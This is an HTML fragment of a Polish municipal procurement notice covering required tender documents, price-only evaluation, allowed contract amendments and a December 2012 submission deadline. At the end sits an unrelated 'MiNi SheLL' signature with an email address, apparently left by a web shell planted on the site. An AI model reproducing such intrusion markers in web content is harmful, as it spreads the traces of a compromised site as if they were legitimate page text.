<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dowód wniesienia/ wpłacenia wadium, zaakceptowany - podpisany i wypełniony wzór umowy (zał. nr 4), oświadczenie  o całodobowym przyjmowaniu zgłoszeń awarii wraz ze wskazaniem nr telefonu
*jeśli dotyczy- pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
**jeśli dotyczy pełnomocnictwo do złożenia oferty w wypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa zostanie zawarta na warunkach określonych w SIWZ oraz zgodnie z wzorem umowy załączonym 
do SIWZ (wzór umowy stanowi załącznik 4 do SIWZ).
Zamawiający zgodnie z dyspozycją art. 144 ust. 1 ustawy dopuszcza następujące istotne zmiany treści umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w wypadku wystąpienia jednej z następujących okoliczności, tj.:
1)	w wypadku zmian podmiotowych po stronie Wykonawcy, zgodnie z obowiązującymi przepisami prawa,
2)	w wypadku niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych, które mają wpływ na realizację zamówienia publicznego,
3)	w wypadku zmian nr rachunku bankowego wykonawcy, na który jest płacone wynagrodzenie,
4)	w wypadku przedłużania się uzgodnień zewnętrznych w organach administracji publicznej z przyczyn nie leżących po stronie Wykonawcy,
5)	w wypadku, gdy podczas realizacji zamówienia konieczne stanie się wprowadzenie zmian projektowych lub technologicznych,
6)	w wypadku zmian personelu wykonawcy odpowiedzialnego za realizacje przedmiotu zamówienia- zmiany kluczowych specjalistów przedstawionych w ofercie - zmiany z inicjatywy Zamawiającego lub Wykonawcy, w każdym uzasadnionym przypadku za uprzednią pisemną zgodą zamawiającego, akceptującego nowego specjalistę, pod warunkiem, że spełnia on kryteria przyjęte w SIWZ, 
7)	w wypadku zmian terminu wykonania umowy lub jej części. W szczególności w przypadku opóźnienia 
w realizacji zamówienia nie leżących po stronie wykonawcy strony umowy podpiszą aneks do umowy przedłużający okres wykonywania zamówienia o niezbędny czas,
8)	w wypadku zmian stanu prawnego lub faktycznego, które mają wpływ na treść zawartej umowy, jeżeli tak zamiana leży w interesie publicznym,
9)	w pozostałym zakresie - w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia strony nie mogły przewidzieć pomimo zachowania należytej staranności,
10)	w wypadku zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania umowy albo zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które były niemożliwe do przewidzenia w chwili zawarcia umowy.
Zmiany postanowień zawartej umowy będą dokonane bez zbędnej zwłoki, za zgodą stron, wyłącznie w formie pisemnego aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.michalowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, pok. 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2012 godzina 12:00, miejsce: Siedziba Zamawiającego, Sala Obsługi Interesantów - Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com